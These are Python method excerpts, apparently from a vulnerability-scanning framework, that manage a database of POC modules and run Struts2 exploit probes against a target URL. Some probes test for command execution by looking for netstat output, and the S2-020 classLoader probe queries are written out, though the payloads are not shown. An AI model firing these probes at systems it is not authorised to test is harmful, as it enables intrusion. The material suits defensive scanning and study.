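    def print_poc_name_info(self, PL_POC_NAME):
        """Print the stored modules whose file name contains *PL_POC_NAME*.

        Rows are taken from ``self.sql_exec.select()`` and read positionally as
        ``(poc_name, poc_name_path, date)``.  A row is listed when
        *PL_POC_NAME* is a substring of the file-name part of ``poc_name_path``
        (suffix removed with ``pl_del_suffix`` for display).  An empty or
        ``None`` *PL_POC_NAME* prints a red "not found" line instead.

        The database handle is closed exactly once on every path; the
        original closed it twice on the "not found" branch.
        """
        cursor = self.sql_exec.select()
        desc = '''

    DirFileName
    -----------

        '''
        row_fmt = "   {FileName:<55}{Name:<25}{Date:<20}"
        try:
            if not PL_POC_NAME:
                print(setcolor.set_red("[-] ") + "Sorry! Not Found Module.")
                return

            print(desc)
            print(row_fmt.format(FileName="FileName", Name="Name", Date="Date"))
            print(row_fmt.format(FileName="--------", Name="----", Date="----"))
            print("")

            try:
                for row in cursor:
                    poc_name, poc_name_path, date = row[0], row[1], row[2]
                    # Only the file-name part takes part in the match.
                    file_name = os.path.split(poc_name_path)[1]
                    if PL_POC_NAME not in file_name:
                        continue
                    print(row_fmt.format(
                        FileName=pl_del_suffix(poc_name),
                        Name=pl_del_suffix(file_name),
                        Date=date))
            except Exception:
                # Best-effort listing, as before: a failing row or cursor
                # ends the listing quietly; the handle is closed in finally.
                return
        finally:
            self.sql_exec.db_close()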
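 def check(self, pocname, vulnstr):
     """Print a verdict for *pocname* based on the response body *vulnstr*.

     The body is searched for fixed substrings (they look like ``netstat``
     output headers -- the POC payloads themselves are not visible here) and
     the OS tag is taken from the first one found, in the order below.  No
     hit prints the green "not vulnerable" line.

     Interpreting the result: this is a plain substring match, so a page that
     legitimately contains e.g. "LISTEN" is reported as vulnerable.  Treat a
     hit as a candidate to confirm, not as proof.

     Fix over the original: ``str.find(...) is not -1`` compared an int by
     identity, which only works because CPython caches small ints.
     """
     # (marker, OS tag) in priority order; the first match wins, exactly like
     # the original if/elif chain.
     markers = (
         ("Active Internet connections", "[Linux]"),
         ("Active Connections", "[Windows]"),
         ("活动连接", "[Windows]"),
         ("LISTEN", "[未知OS]"),
     )
     for marker, os_tag in markers:
         if marker in vulnstr:
             print(setcolor.set_red("[*] 目标存在" + pocname + "漏洞.." + os_tag))
             return
     print(setcolor.set_green("[*] 目标不存在" + pocname + "漏洞.."))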
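 def insert_poc_name(self):
     """Register every POC module under ``self.PWD`` and mark the load done.

     Walks ``self.PWD`` and inserts each ``*.py`` file except ``__init__.py``
     as ``(file_name, file_path, self.date)`` through ``self.sql_exec.insert``:
     ``file_name`` is the path relative to ``self.PWD`` (keeps a leading "/"),
     ``file_path`` the full one.  On success ``STATUS.FLAG`` is set to 'True'.

     On an exception during the walk/insert the red error line is printed and
     the STATUS update is skipped.  The original closed the connection inside
     the handler and then still ran the UPDATE on it and closed it a second
     time; here the connection is closed exactly once on every path.
     """
     sql = "UPDATE STATUS set FLAG = 'True' WHERE ID = 1"
     try:
         for root, dirs, files in os.walk(self.PWD):
             for name in files:
                 if not name.endswith('.py') or name == '__init__.py':
                     continue
                 # Keep the original string building: "/" separators and a
                 # leading "/" on the relative name, regardless of platform.
                 file_name = root.replace(self.PWD, "") + "/" + name
                 file_path = root + "/" + name
                 self.sql_exec.insert(file_name, file_path, self.date)
     except Exception:
         print(setcolor.set_red("[!] ") + "加载PAYLOAD失败,请重新运行!")
         return
     else:
         self.sql_exec.update(sql)
     finally:
         self.sql_exec.db_close()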
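 def exist_poc(self):
     """Insert the POC modules on disk that the database does not know yet.

     Reads the stored modules with ``self.sql_exec.select()``, walks
     ``self.PWD`` for ``*.py`` files (skipping ``__init__.py``) and asks
     ``self.cmp_module(cursor, file_name, file_path)`` whether a file is new;
     a truthy answer inserts ``(file_name, file_path, self.date)``.

     On an exception the red error line is printed.  The connection is
     closed exactly once on every path (the original closed it twice when
     the walk failed).
     """
     cursor = self.sql_exec.select()
     try:
         for root, dirs, files in os.walk(self.PWD):
             for name in files:
                 if not name.endswith('.py') or name == '__init__.py':
                     continue
                 # Same path strings as insert_poc_name: "/" separators, and
                 # a leading "/" on the name relative to self.PWD.
                 file_name = root.replace(self.PWD, "") + "/" + name
                 file_path = root + "/" + name
                 # cmp_module presumably returns a bool ("not stored yet");
                 # the original compared its result with `== True`.
                 if self.cmp_module(cursor, file_name, file_path):
                     self.sql_exec.insert(file_name, file_path, self.date)
     except Exception:
         print(setcolor.set_red("[!] ") + "加载PAYLOAD失败,请重新运行!")
     finally:
         self.sql_exec.db_close()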
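    def scan(self):
        """Run every Struts2 probe against ``self.url`` and print the verdicts.

        Each table entry issues one request -- POST probes send
        ``self.poc[key]`` as the body, GET probes append it to the URL -- and
        hands the response text to ``self.check``.  S2-045 / S2-048 use the
        module-level ``headers2`` / ``headers3`` instead of a POC entry, and
        the S2-020 check at the end compares two status codes rather than a
        body.  The probe order is the original one.

        Every request runs with ``timeout=6`` and ``verify=False``.  With
        certificate verification off the answer may come from an intercepting
        middlebox rather than the target, so a positive verdict should be
        confirmed before being acted on.
        """
        print(setcolor.set_cyan("====-------检测struts2漏洞--------====\n目标url:" +
                                self.url))

        # (label, HTTP verb, key into self.poc)
        probes = (
            ("struts2-005", "post", "ST2-005"),
            ("struts2-009", "post", "ST2-009"),
            ("struts2-013", "post", "ST2-013"),
            ("struts2-016", "post", "ST2-016"),
            ("struts2-019", "post", "ST2-019"),
            ("struts2-devmode", "get", "ST2-devmode"),
            ("struts2-032", "get", "ST2-032"),
            ("struts2-033", "get", "ST2-033"),
            ("struts2-037", "get", "ST2-037"),
        )
        for label, verb, key in probes:
            if verb == "post":
                self._probe(label, requests.post, self.url,
                            headers=headers, data=self.poc[key])
            else:
                self._probe(label, requests.get, self.url + self.poc[key],
                            headers=headers)

        self._probe("struts2-045", requests.get, self.url, headers=headers2)
        self._probe("struts2-048", requests.post, self.url,
                    data="", headers=headers3)

        # S2-020 (detection only): 200 for the first query together with 404
        # for the second is taken as the signature.
        try:
            req1 = requests.get(self.url +
                                "?class[%27classLoader%27][%27jarPath%27]=1",
                                headers=headers,
                                timeout=6,
                                verify=False)
            req2 = requests.get(self.url +
                                "?class[%27classLoader%27][%27resources%27]=1",
                                headers=headers,
                                timeout=6,
                                verify=False)
        except requests.RequestException:
            print(setcolor.set_cyan("[-] 检测struts2-020超时.."))
            return
        if req1.status_code == 200 and req2.status_code == 404:
            print(setcolor.set_red("[*] 目标存在struts2-020漏洞..(只提供检测)"))
        else:
            print(setcolor.set_green("[+] 目标不存在struts2-020漏洞.."))

    def _probe(self, label, send, url, **kwargs):
        """Issue one probe with *send* (``requests.get``/``post``) and check it.

        Adds the shared ``timeout=6`` / ``verify=False`` settings to *kwargs*.
        Only transport errors (``requests.RequestException``: timeouts,
        connection failures) are reported with the "超时" line the original
        printed; any other exception -- a missing POC key, a bug in ``check``
        -- propagates instead of being misreported as a timeout, which is what
        the original bare ``except`` did.
        """
        try:
            req = send(url, timeout=6, verify=False, **kwargs)
        except requests.RequestException:
            print(setcolor.set_cyan("[-] 检测" + label + "超时.."))
            return
        self.check(label, req.text)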